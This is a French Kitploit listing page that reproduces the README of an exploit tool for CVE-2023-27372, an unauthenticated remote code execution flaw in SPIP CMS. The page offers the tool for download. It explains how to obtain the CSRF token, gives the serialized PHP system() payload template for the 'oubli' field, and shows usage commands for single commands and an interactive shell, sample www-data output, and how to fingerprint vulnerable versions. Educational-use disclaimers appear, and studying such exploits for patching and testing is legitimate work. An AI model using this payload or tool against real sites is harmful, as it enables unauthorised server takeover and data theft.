Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/scriniariii/cve-2023-27372
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubscriniariii/cve-2023-27372

CVE-2023-27372

Exploit pour CVE-2023-27372 avec shell interactif

Voir le dépôt
1il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit CVE-2023-27372

Exploit pour CVE-2023-27372, une vulnérabilité d'exécution de code à distance sans authentification dans le CMS SPIP affectant les versions antérieures à 4.2.1.

⚠️ À des fins éducatives uniquement. Utilisez exclusivement sur des systèmes vous appartenant ou pour lesquels vous disposez d'une autorisation écrite explicite de test. Toute utilisation non autorisée est illégale.


Vue d'ensemble

SPIP est un CMS open-source largement utilisé pour la publication web. Cette vulnérabilité se situe dans le formulaire de récupération de mot de passe (/spip.php?page=spip_pass), où le paramètre oubli est traité sans validation appropriée, permettant à un attaquant d'injecter et d'exécuter du code PHP arbitraire sur le serveur — sans aucune authentification requise.

Télécharger l’outil
ChampDétails
CVECVE-2023-27372
Score CVSS9.8 (Critique)
Vecteur d'attaqueRéseau
AuthentificationAucune requise
Versions affectéesSPIP < 4.2.1
Type de vulnérabilitéInjection de code / RCE sans authentification

Comment ça marche

  1. Récupérer le jeton CSRF — Une requête GET est envoyée à /spip.php?page=spip_pass pour extraire le jeton formulaire_action_args du formulaire HTML.

  2. Construire la charge utile — Une chaîne PHP sérialisée est élaborée avec la commande à exécuter :

    root@kitploit:~
    s:N:"<?php system('COMMAND'); ?>";
    

    Où N est la longueur exacte en octets de la chaîne PHP interne.

  3. Envoyer la charge utile — Une requête POST est effectuée avec la charge utile élaborée dans le champ oubli accompagnée du jeton CSRF. SPIP traite ce champ sans validation et exécute le code PHP injecté.

  4. Extraire la sortie — La sortie de la commande est renvoyée dans la réponse HTML et extraite de l'attribut value du champ de saisie oubli.

Prérequis

  • Python 3.x
  • requests
  • beautifulsoup4
  • argparse
  • regex

Installation

root@kitploit:~

git clone https://github.com/scriniarii/CVE-2023-27372

cd CVE-2023-27372

pip install requests beautifulsoup4

Utilisation

root@kitploit:~
python3 exploit.py -u <URL> -c <command>
ArgumentDescription
-u, --urlURL de base de l'instance SPIP cible
-c, --commandCommande système à exécuter sur la cible
-s, --shellShell interactif

Exemple

root@kitploit:~

python3 exploit.py -u http://TARGET/ -c "id"
root@kitploit:~

python3 exploit.py -u http://TARGET/ -s

Sortie attendue :

root@kitploit:~
[+] Token found : JWDCxt5PTFzhPb...
 
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Versions affectées

Pour vérifier la version SPIP d'une cible, recherchez la balise meta generator dans le HTML :

root@kitploit:~
<meta name="generator" content="SPIP 4.2.0" />

[!CAUTION]
⚠️ Avertissement
Veuillez utiliser les informations et exploits fournis dans mes dépôts à des fins éducatives et de divulgation responsable uniquement. Je ne suis pas responsable de toute utilisation abusive ou des dommages causés par l'utilisation de ces outils, scripts ou exploits.